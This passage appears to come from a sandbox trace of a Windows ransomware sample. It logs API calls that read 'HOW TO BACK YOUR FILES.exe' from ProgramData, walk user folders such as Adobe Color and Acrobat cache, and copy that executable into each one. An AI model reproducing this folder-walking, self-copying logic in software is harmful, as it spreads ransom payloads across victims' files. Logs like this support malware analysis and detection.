(lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0106.607] GetLastError () returned 0x0 [0106.607] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0106.607] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0106.607] CloseHandle (hObject=0x120) returned 1 [0106.607] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0106.607] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0106.607] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Color\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x70bc3940, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x70bc3940, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0106.607] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0106.607] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0106.607] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Color\\Profiles", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Color\\Profiles") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Color\\Profiles" [0106.607] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b120 | out: hHeap=0x2b0000) returned 1 [0106.607] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e77c8 | out: hHeap=0x2b0000) returned 1 [0106.607] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Color\\Profiles") returned 167 [0106.607] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Color\\Profiles" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Color\\Profiles") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Color\\Profiles" [0106.607] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0106.607] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Color\\Profiles\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\adobe\\color\\profiles\\how to back your files.exe"), bFailIfExists=1) returned 0 [0106.608] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0106.608] GetLastError () returned 0x0 [0106.608] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0106.608] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0106.608] CloseHandle (hObject=0x120) returned 1 [0106.609] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0106.609] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0106.609] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Color\\Profiles\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xce4463a0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x70cce2e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x70cce2e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0106.609] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0106.609] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0106.609] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat" [0106.609] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0106.609] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7808 | out: hHeap=0x2b0000) returned 1 [0106.609] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat") returned 160 [0106.609] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat" [0106.609] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0106.609] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\adobe\\acrobat\\how to back your files.exe"), bFailIfExists=1) returned 0 [0106.610] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0106.610] GetLastError () returned 0x0 [0106.610] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0106.610] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0106.610] CloseHandle (hObject=0x120) returned 1 [0106.610] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0106.610] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0106.610] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x4febe4e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4febe4e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0106.611] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0106.611] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0106.611] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0" [0106.611] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0106.611] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7808 | out: hHeap=0x2b0000) returned 1 [0106.611] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0") returned 165 [0106.611] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0" [0106.611] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0106.611] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\adobe\\acrobat\\10.0\\how to back your files.exe"), bFailIfExists=1) returned 0 [0106.612] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0106.612] GetLastError () returned 0x0 [0106.612] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0106.612] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0106.612] CloseHandle (hObject=0x120) returned 1 [0106.612] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0106.612] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0106.612] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7103a280, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x7103a280, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0106.612] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0106.612] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0106.613] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Cache", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Cache") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Cache" [0106.613] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32cfc8 | out: hHeap=0x2b0000) returned 1 [0106.613] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7808 | out: hHeap=0x2b0000) returned 1 [0106.613] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Cache") returned 171 [0106.613] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Cache" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Cache") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Cache" [0106.613] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0106.613] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Cache\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\adobe\\acrobat\\10.0\\cache\\how to back your files.exe"), bFailIfExists=1) returned 0 [0106.613] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0106.614] GetLastError () returned 0x0 [0106.614] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0106.614] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0106.614] CloseHandle (hObject=0x120) returned 1 [0106.614] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0106.614] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0106.614] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Cache\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xecb5bdd0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0x710603e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x710603e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0106.614] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0106.614] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0106.614] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe" [0106.614] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d6cf0 | out: hHeap=0x2b0000) returned 1 [0106.614] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c28 | out: hHeap=0x2b0000) returned 1 [0106.615] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe") returned 135 [0106.615] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe" [0106.615] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0106.615] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\application data\\application data\\application data\\application data\\adobe\\how to back your files.exe"), bFailIfExists=1) returned 0 [0106.615] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0106.616] GetLastError () returned 0x0 [0106.616] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0106.616] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0106.616] CloseHandle (hObject=0x120) returned 1 [0106.616] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0106.616] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0106.616] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x4febe4e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4febe4e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0106.616] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0106.616] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0106.616] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Color", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Color") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Color" [0106.616] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cded0 | out: hHeap=0x2b0000) returned 1 [0106.616] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7808 | out: hHeap=0x2b0000) returned 1 [0106.616] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Color") returned 141 [0106.616] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Color" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Color") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Color" [0106.616] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0106.616] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Color\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\application data\\application data\\application data\\application data\\adobe\\color\\how to back your files.exe"), bFailIfExists=1) returned 0 [0106.617] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0106.617] GetLastError () returned 0x0 [0106.617] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0106.617] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0106.617] CloseHandle (hObject=0x120) returned 1 [0106.618] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0106.618] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0106.618] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Color\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x70bc3940, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x70bc3940, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0106.618] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0106.618] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0106.618] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Color\\Profiles", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Color\\Profiles") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Color\\Profiles" [0106.618] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d6cf0 | out: hHeap=0x2b0000) returned 1 [0106.618] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7808 | out: hHeap=0x2b0000) returned 1 [0106.618] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application 